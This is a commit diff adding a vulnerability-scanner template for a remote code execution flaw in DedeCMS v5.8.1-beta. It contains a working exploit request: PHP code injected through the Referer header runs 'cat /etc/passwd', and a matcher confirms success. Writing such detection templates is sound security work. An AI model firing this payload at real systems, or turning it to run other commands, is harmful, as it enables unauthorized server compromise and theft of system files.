Create dedecms-rce.yaml
parent
f03da60adc
commit
8823370bdf
|
@ -0,0 +1,31 @@
|
||||||
|
id: dedecms-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DedeCMS v5.8.1-beta - Remote Code Execution
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The vulnerability is due to a variable override vulnerability in DedeCMS that allows an attacker to construct malicious code with template file inclusion without authorization to cause remote command execution attacks and ultimately gain the highest privileges on the server.
|
||||||
|
reference:
|
||||||
|
- https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
|
||||||
|
- https://sectime.top/post/1d114771.html
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: dedecms,cms,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: <?php "system"($c);die;/*ref
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue